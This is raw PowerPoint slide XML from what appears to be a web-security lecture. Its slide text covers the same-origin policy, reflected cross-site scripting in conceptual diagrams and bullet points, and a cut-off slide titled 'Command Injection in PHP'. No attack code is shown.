              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="70687" name="Picture 31" descr="j0215940">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1402C73-BB5C-234D-B911-0A171FE36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 y="3520"/>
              <a:ext cx="19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8" name="Picture 32" descr="j0215940">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{311993EF-DF84-5E47-8624-B9816AED8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3600"/>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677" name="AutoShape 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06B7B766-C32F-A84B-BF56-D9FC0757649E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9296400" y="2695575"/>
            <a:ext cx="1143000" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="foldedCorner">
            <a:avLst>
              <a:gd name="adj" fmla="val 28569"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="DDDDDD"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>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hello.cgi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69D4AA94-EED5-CD48-A503-06528999AFDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3180214" y="1922166"/>
            <a:ext cx="2349500" cy="646113"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF99CC"/>
          </a:solidFill>
          <a:ln w="19050">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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>What is the ORIGIN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>of this script?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Line 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D2D7243-C495-FF47-9D40-484BEAAD297F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4572000" y="2584154"/>
            <a:ext cx="76200" cy="1227435"/>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7" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9846930-D332-1943-83F2-56E1CD418529}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6629400" y="1446213"/>
            <a:ext cx="2349500" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF99CC"/>
          </a:solidFill>
          <a:ln w="19050">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How about this one?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Line 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B81C35A-CBE6-0049-B68C-E9E36A06103D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8229600" y="1828800"/>
            <a:ext cx="152400" cy="289560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9" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07199A6A-101D-2B4E-9EF5-17829722D6DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2318058" y="6010833"/>
            <a:ext cx="3536950" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF99CC"/>
          </a:solidFill>
          <a:ln w="1905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800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Why does the browser allow this?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Line 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9949A208-E906-9A4D-8112-38226966F598}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3696980" y="5858433"/>
            <a:ext cx="241097" cy="221694"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="41" name="Picture 27" descr="j0215940">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49B1372F-FACB-FB44-8946-04ABBB4F7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0" y="4267200"/>
            <a:ext cx="304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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C62665FB-19B4-C345-A675-4788BC9E7B22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12188662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85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85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85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85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585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58517"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="39" presetID="22" presetClass="entr" presetSubtype="2"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right)">
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="5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8502" grpId="0" animBg="1"/>
      <p:bldP spid="1258513" grpId="0" animBg="1"/>
      <p:bldP spid="1258517" grpId="0" animBg="1"/>
      <p:bldP spid="35" grpId="0" animBg="1"/>
      <p:bldP spid="37"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18" descr="toshiba_satellite_a105_s4284_laptop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D00CDEED-9E2B-F746-9535-4934D1460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040064"/>
            <a:ext cx="14366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11" descr="CompaqAlphaServerES40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE940EC5-C1CE-ED47-BFBB-8424931C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275" y="4979988"/>
            <a:ext cx="1155700"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descr="DS15serverfront">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{632FAAC1-8625-1142-A2CD-9164166EFB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6788" y="2343150"/>
            <a:ext cx="2436812"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6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB168440-9A24-1442-8E47-F8E77EEF929A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7696200" y="1962150"/>
            <a:ext cx="1571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Attack server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72711" name="Text Box 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A6B0216-2FD5-834C-A835-62C8B00883A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7010401" y="4552950"/>
            <a:ext cx="1624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Server victim </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="72712" name="Straight Arrow Connector 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D80E1C49-47EA-F14E-A9DC-31DF6726DAD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3798888" y="2359025"/>
            <a:ext cx="3211512" cy="6873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3" name="Text Box 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C537AB5E-AEF7-9747-9D27-03CF1DB8E207}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2030969" y="4458582"/>
            <a:ext cx="1359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User victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72714" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1287FBDC-84FF-AB45-A1A6-35FAF9D97AB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="4784307" y="2171670"/>
            <a:ext cx="15311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visit web site</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="72715" name="Straight Arrow Connector 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA87CF71-DB33-2347-B13E-CF1D4847B114}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="3798888" y="2741613"/>
            <a:ext cx="3440112" cy="773112"/>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6" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6A4C2BA-8759-B84B-A2C8-D9CD33F9EBC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-743562">
            <a:off x="4320255" y="2708245"/>
            <a:ext cx="26196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receive malicious page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="72717" name="Straight Arrow Connector 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5844D0DE-62E5-854C-80C4-7D8694D5A91A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4027488" y="4400550"/>
            <a:ext cx="2830512" cy="99060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18" name="TextBox 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FFBDF49-103F-FC45-8600-57DC11CD7ACD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="4802189" y="4508500"/>
            <a:ext cx="165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click on link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72719" name="TextBox 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{629AED91-C8A0-AA4D-8210-4E7AABB80546}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="4071939" y="4959350"/>
            <a:ext cx="263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echo user input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72720" name="Oval 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61736737-CD05-464B-9DA3-270AB92DE3CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4343401" y="2387601"/>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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72721" name="Oval 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86F18138-B700-5A46-8D84-255EDDEBEEC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3962401" y="3044826"/>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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72722" name="Oval 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD36AD69-B7F5-3F45-B464-0E12E9E07B93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="4467226" y="4143376"/>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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="72723" name="Straight Arrow Connector 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{867CF5E8-1BE1-E440-B8E3-BEB573B49116}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3505200" y="4762500"/>
            <a:ext cx="3352800" cy="1162050"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="2857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72724" name="Straight Arrow Connector 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03259511-0CD5-5744-8479-100F208AF5BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3951288" y="3332164"/>
            <a:ext cx="3211512" cy="68738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25" name="TextBox 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5301AF7A-169F-6B4B-A288-9E8F521CA6CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="4651692" y="3187670"/>
            <a:ext cx="21996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send valuable data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72726" name="Oval 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{008CD83B-A5B4-FC48-84B0-28409D88187D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4267201" y="3486151"/>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5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72727" name="Oval 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C4696B1-8E4F-7345-ADE3-8EC6939760FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="3781426" y="4445001"/>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4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC3E059C-2A1A-9040-8C0A-FE9A1D4F65F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Basic Pattern for Reflected XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2206024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71684" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{888E9711-8B4A-B94F-A1AA-10A2DC8696B4}"/>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rPr>
              <a:t>Reflected XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71683" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAE0A6DE-ED2A-614B-BD6A-53271D4BD068}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5478123" y="559477"/>
            <a:ext cx="6249057" cy="5475563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>User is tricked into visiting an honest website via a URL containing an attack script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Phishing email, link in an ad, blog comment…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Bug in website code causes it to echo the script to the user’s browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>The script’s origin is now the website itself!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Script can manipulate website contents (DOM) to show bogus information, request sensitive data, control form fields on this page and linked pages, cause user’s browser to attack other websites</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81829BBC-5FDC-5444-98E8-0A460C48A899}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8120418" y="5929191"/>
            <a:ext cx="3296095" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Why does this not violate SOP??</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38727312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5CB3F18-4DE5-D64E-B255-B58B672D4750}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Command Injection in PHP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36867" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77BBF7FC-BF49-724B-A38B-E10745F8FA1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
